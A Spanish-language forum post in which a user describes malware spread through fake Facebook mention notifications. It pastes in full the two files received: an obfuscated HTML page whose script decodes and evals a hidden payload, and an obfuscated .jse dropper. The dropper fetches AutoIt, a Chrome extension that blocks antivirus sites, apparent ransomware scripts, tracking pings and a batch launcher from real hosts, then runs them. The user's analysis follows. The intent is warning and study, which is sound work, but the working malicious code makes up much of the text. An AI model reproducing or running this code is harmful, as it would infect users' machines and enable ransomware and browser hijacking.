Search the Community

Ya van dos veces que en facebook recibo una notificacion diciendo "[Nombre de un amigo mio] te mencionó en un comentario". Me parece que el estilo de la notificación y el texto son muy convincentes, no encontré nada fuera de lugar. Pero cuando toco la notificación en vez de ir a un comentario se descarga un archivo muy dudoso. La primera vez se me descargó un html y hoy un javascript. Al abrirlos se nota bien que son maliciosos. Pego los dos archivos que recibí: FACEBOOK99506256.html <html><i id="iyftoximrggvmrj"><i><center><center><i class="jhdbnkxzbgznks"><img class="bwbxaidctct"><i class="cwijwvtogp"><img><span></span><ul id="qlbziwsxdijh"><center><div id="fhhxtvmnlyokg"></span><div><span id="dfdknaeimrtk"><center id="iuigmfrfpsruqua"></center></i><a href="http://hrdrokufcaleeqo.com"></a><ulid="ekjhallksdnks"></img><center id="effqbrsgcc"><title>Lesli Cagua</title><ul id="caquzvszdqlqt"></i></center></div></i><a href="https://ripfznzxbvjxcsnvp.com"></a><img id="oanusjmbzsbmr"><center id="mpyifckxxtjfik"><i id="dhfpzedmobxbr"><img></ul><div class="ovcvbsugvhux"><ul id="ybftpjvmxql"><span><ul id="ymccjrdqcbrhv"><center class="edwenobzysreq"><img><i><i class="nsbqpgeehddzviq"><a href="http://gnyaqyllencttg.me"></a><span><span class="phjfnweomczzoem"><span id="iyhoixtiyl"><div><ul></img><img class="vfljojcxio"><a class="fqhozmmldb"></span><div><a href="http://hvtydixqvtwfvkkauu.ml"></a><img class="qfcjtjfnijwfz"><img id="zfotzhfsbnhfdm"><a id="acqfbiuuwpivuwp"><ul class="lmguanmthmvyswh"><a href="http://yluwdrepihhhodwedggk.tk"></a><span id="wniuydrbuvrcdi"><img></ul><i class="cnflieoafjvx"></a><span></div><img></ul></i><div class="skwsritmgyzvupy"><ul id="oidxvlmddewnboe"><center></span><img><div id="eaoiekvfzapirf"></div><script>function RMytzvEDK(qfKbOGjpE) {var jheYmerWUA="hAdTUaaSASgrPdjBIkBQuJUsVZJSTkybLCUFDVydOFuEJDfrOHhiqcBmbleVvDWgfRMINlMBQhfzKkQyRY"; gVOfasKQ = ".*blD}5h>2rOQKXvHtZ/L'Y:y)=j;Mm3G{eNPo_8p],R7iE&csd!J+kC1gB?-SfxnUa6A0(VI[<qFw%Tz ".split("");qfKbOGjpE = atob(qfKbOGjpE.split("").reverse().join("")).split("-");KnaxLtWh = "";for (var ARnQXXSLEba = 0; ARnQXXSLEba < qfKbOGjpE.length; ARnQXXSLEba++) {if(typeof gVOfasKQ[qfKbOGjpE[ARnQXXSLEba]] != "undefined") {KnaxLtWh = KnaxLtWh + gVOfasKQ[qfKbOGjpE[ARnQXXSLEba]];var ibiudtyZPbWWh="IQBTCcKJhkusaTkZAsbJMedleSmaOtOxkprMscvAmQSnJdmkvoTitWtxPFxEZmbjBtWUvsuHimUSqhcLvVTPSnmHT";}var lSWncyGYscrMJz="ErpMtbipVXhikOcUaURoXqVWIXnvHNvleLYyNgOIeVRoKTjLOaZMqUIZSWvzJQLOCJnpQbYUXPiHJstysskJnTJgQeFzVroybBNR";}var LMABVilnBJGUU="iOZoEeUdalsymTlewXQXyLfKYGtEBoUJcTXGYSKYdcwqWHutFkqeVvOUciyEwtnym";return KnaxLtWh;}var vgoiyuazrwxkh=RMytzvEDK("=MTL2YTL1ETLtQzM");var gaegqntejry=RMytzvEDK("=MTL2YTL1ETLtQzM");var pjnovytgcipj=RMytzvEDK("=ITL3MTL3ETLtYjN");var uhgdhbjvjhq=window;uhgdhbjvjhq[gaegqntejry](uhgdhbjvjhq[vgoiyuazrwxkh](uhgdhbjvjhq[pjnovytgcipj]('Uk15dHp2RURLKCJ0MFNMdDBTTHRnak10VWpNdEF6TnRBVE50UWpOdFF6TXRrRE50QVRMd1FUTDNFVEwzRVRMMzB5TTIwU0x0MENPeTBTTnkwQ056MFNOMzBDTXgweU54MFNONDBpTTAwU055MENNMzBDTXoweU56MENNMTBDTjIwaU4yMENNeDBDTXRjVEwzRVRMMllUTDVJVEx6VVRMeElUTDVVVEx4SVRMelVUTDFJVEwyMGlOMTBpTjEwaU0wMHlOMjBTTzIwaU4xMGlNMDB5TjIweU4zMGlNMDBpTnRZVE50WVROdElETnRjak50a2pOdFlUTnRJRE50UUROdGN6TnRJRE50WXpOdGtqTnRZVE50SUROdFlUTnRZVE50WVROdElETnRZek50WXpOdElETnRjak50Y3pOdElETnRZVEwyVVRMMlVUTHlRVEw1WVRMNVlUTDJVVEx5UVRMMlVUTDVZVEwyVVRMeVFUTDJVVEw1WVRMMlVUTHlRVEw1MGlOMTBpTjEwaU0wMGlOdFlUTnRZVE50SUROdGNqTnRZVE50WVROdElETnRZVEwyVVRMMlVUTHlRVEwwUVRMMmNUTHlRVEw1MFNPMjBpTjEwaU0wMFNNejBTTzIwaU4xMGlNMDBTTzIwaU4xMGlOMTBpTTAwaU50a2pOdFlUTnRJRE50a1RMNTBpTjEwaU0wMENOMDBpTjMwaU0wMFNPejBTTzIwaU4xMGlNMDBTT3owaU4zMENNMzBDTnowQ00xMHlOejBTTjEwQ014MGlOMjB5TnRVVE50QXpNdGN6TXRBVE10SWpOdEFUTDNVVEwwWVRMMVFUTHdFVEwzRVRMeFlUTHpVVEx4SVRMNUVUTDVFVEx4SVRMelVUTDFJVEx4SVRMeklUTHdRVEwzRVRMM0VUTDMwU015MHlNeTBTTXkweU15MFNPMDBDTTAweU54MHlOeDB5TnRFak10a1ROdFVqTXRFak10TWpNdGtETnRBRE50Y1RNdGNUTXRjVEx4SVRMMWdUTDJJVEwySVRMMWdUTHoweU56MENPMDB5TnoweU54MHlOejBDTXgwQ00wMENNdFFqTnRjek10VUROdGNUTXRZak50Z0ROdGN6TXRNVEx3Y1RMd2NUTDFnVEx5UVRMeElUTHpnVEwyUVRMeU1UTHhJVEx3Y1RMMFlUTDBNVEx3UVRMM01UTHcwQ00wMHlOeDB5TngweU50TWpOdDBTTHRnak10VVRMdDBTTDEwU0x0MFNMNElUTDFJVEwzRVRMellUTDBNVEx6Z1RMME1UTDVRVEwwWVRMM01UTHdRVEw1UVRMME1UTHdFVEx3MENNMDB5TngweU54MHlOdE1qTnRBek50TVRMMllUTDFFVEwwTVRMdDBTTHQweU16MFNONDBTTnkwU08yMFNPMjBTT3RVRE90WWpNdFlqTXRVRE90a0ROdFV6TnRjVE10WWpOdGNUTXRrRE50QVRMd1FUTDNFVEwzRVRMMzB5TTIwU040MHlOMDB5TjAwU040MHlOMzBTTjQwaU55MGlOeTBTTjQwQ056MHlOeDBpTjIweU54MFNNMjBDTnkwQ00xMGlOMjBDTnowQ014MENNdEFETnRjVE10Y1RNdGNUTHpZVEx3Y1RMMWdUTHlZVEwxUVRMdDBTTHRNek10VURPdFVqTXRBek50UWpOdGN6TXRVRE50Y1RNdGdETnRRak50VXpOdElqTnRVRE90WWpNdFVET3RRek10Y1ROdFFqTnRZak50Y1RMNFFUTDBNVEwzRVRMMllUTDNFVEw1UVRMMElUTHdVVEwyWVRMME1UTHdFVEwwWVRMM01UTHcwQ00wMHlOeDB5TngweU50TWpOdDBTTHRnak10VWpNdEF6TnRjVE10a0ROdFF6TXRVek50a3pOdFF6TXRNRE50QUROdGNUTXRjVE10WVRNdEFqTXRrak10UVRNdFVET3RFRE90UXpNdFFqTnRVRE90WWpNdFVET3RBRE50Y1RNdGNUTXRjVEx6WVRMMWdUTHdFVEwyWVRMMUVUTHQwU0w1RVRMeDBDT3kwaU55MENPMjBpTngwQ00xMFNPdElUTnRFek10WWpOdFFET3RjVEx4TVRMd1VUTDNjVEx5VVRMNTBDTzAwQ04yMGlNMTBDTjIwaU10VXpOdGNUTDBZVEw0RVRMMElUTDMwQ016MGlOMjBTTTQweU0wMFNPdFlqTnRFVEw1RVRMdDBTTCIpOw==')))</script></ul><span><a id="zrnfrnuzfzomqga"><center class="tocngmhneger"><a href="http://faemnlzrsedapjvz.cf"></a><ul><a href="http://gabsonsfxojxds.ml"></a><img><img id="jgwhnxiflwyr"><span class="dnnlmpfinamtxv"><span><span></ul><i><ul class="pbunwvizja"><span><a href="http://doddxdoahvgkeh.net"></a></span></html> comment_33385454.jse var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C\x66\x66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3|| !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix= new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso= new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1= new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this) EDIT 5: Hay algunas cosas que supuse mal, para ver qué hace el malware ver http://security.stackexchange.com/questions/128254/i-was-tricked-on-facebook-into-downloading-an-obfuscated-script EDIT: Me gustaria saber si es una aplicacion, una falla de diseño de Facebook o que. Luego me pongo a ver el codigo un poco EDIT 2: Ahí terminé de ver casi todo lo que hace (creo). No es que sepa mucho sobre malware, me puse a leer el código a lo que pude entender. Ambos tienen una función que reciben strings que no tienen sentido y los decodifican en nombres útiles como "eval", "GET", o cosas así (incluso funciones enteras que luego son evaluadas) que supongo que son las cosas que buscan los antivirus. Hay algunas cosas que no tienen mucho sentido, no me crean tanto FACEBOOK99506256.html Tiene un montón de HTML creo que basura, creo que tampoco es válido (tags que no se cierran, o se cierran en orden incorrecto). Salvo que ese html sea "informacion codificada" no sirve para nada. Tiene un javascript que descarga otro javascript y una dirección web que en mi caso era de publicidades. No pude descargar el javascript, a lo mejor el sitio estaba caído. Las direcciones eran blazingfastspeeds.com/js.js?[numero_aleatorio]y http://lllllllllll.top/end.php?ref=c Después evalúa ese javascript, que supongo que abre la web de publicidades y hace más cosas, pero no pude conseguir ese javascript comment_33385454.jse Descarga varias cosas: Autoit.exeEs un compilador de un lenguaje de scripting, los scripts tienen extensión .au3 bg.js Es una extensión para chrome Tiene una lista de sitios web sobre antivirus, algunos son antivirus como malwarebytes.org, pero otras son sospechosos como anti-virus.by Ejecuta una función en cada página que uno abre, si esa página está en la lista de direcciones web, corta la carga del sitio. Recibe mensajes desde páginas web cargadas y reenvía algo que no se que es Creo que cierra todas las pestañas de facebook abiertas y abre la página principal de facebook, no se por qué Descarga un javascript más, desde http://appcdn.co/data.js?r=[numero_aleatorio]&url=[sitio_actual]'>http://appcdn.co/data.js?r=[numero_aleatorio]&url=[sitio_actual]y lo ejecuta, lo raro es que esa dirección descarga jquery. Veo que envía un GET con una url y un número aleatorio. A lo mejor hay una url específica que hace que se descargue un javascript malicioso? manifest.jsonCreo que es algo de la extensión ekl.au3No lo miré mucho, similar a force.au3 force.au3Es muy largo, por lo que veo es un ramsomware! ff.zip Me vino vacío Si lo abro con GHEX veo que debe ser un rar, que igual está vacío ping.js Solamente tiene una línea, no se que es: WAU_r_('1,445','pingjse346',-1); EDIT: Después entendí que era, ver el último edit ping2.jsParecido: WAU_r_('1,398','pingjse3462',-1); run.batCompila force.au3 y ekl.au3 con Autoit.exe sabit.au3El MD5 coincide con el de force.au3 up.au3El MD5 también coincide con el de force.au3 Acá hay otro post sobre lo mismo: security.stackexchange.com/questions/128254/facebook-tricked-me-into-downloading-an-obfuscated-script En estos spoilers tengo al comment_33385454.jse y a bg.js un poco acomodados para intentar entender: comment_33385454.jse bg.js EDIT 3: Formato EDIT 4: Otro amigo me mandó dos veces un malware similar. Me mandó un mensaje privado con simplemente un link a un archivo en dropbox. Las dos veces que me lo mandó fueron archivos diferentes, codificados de forma distinta pero que en sí ejecutan el mismo código. Los nombres fueron Tfacebook_59538060.jse y Afacebook_34776416.jse El código que ejecutan es muy similar a comment_33385454.jse: Algo interesante es que entendí que eran los ping.js Creo que son para trackear en cuántas computadoras el malware se ha ejecutado. Eran direcciones web que se descargaban, por ejemplo el último que descargué cargaba esta dirección: http://whos.amung.us/pingjs/?k=pingjse3462 Que buscando un poco en la página pude encontrar esto (ver las URL): http://whos.amung.us/stats/maps/pingjse3462/ Que parecen ser estadísticas de los infectados. Por si les interesa acá van las estadísticas, el comment_33385454.jse linkea a las dos estadísticas mientras que Tfacebook_59538060.jse y Afacebook_34776416.jse linkean solamente a la primera http://whos.amung.us/stats/pingjse3462/ http://whos.amung.us/stats/pingjse346/ Estoy loco o hay más de 100 PCs pings por hora?

Buenas, gracias a un aporte de @@Mgbu, he encontrado este artículo que vale leer por interesante: http://lamiradadelreplicante.com/2015/10/05/linux-wifatch-un-virus-justiciero-anda-suelto-por-la-red/ Un saludo JPablos

Ésta es una de esas pocas veces que copio y pego algo tal cual, pero es que el post que nos ha dejado mcun es uno de esos casos en los que hay que hacer una excepción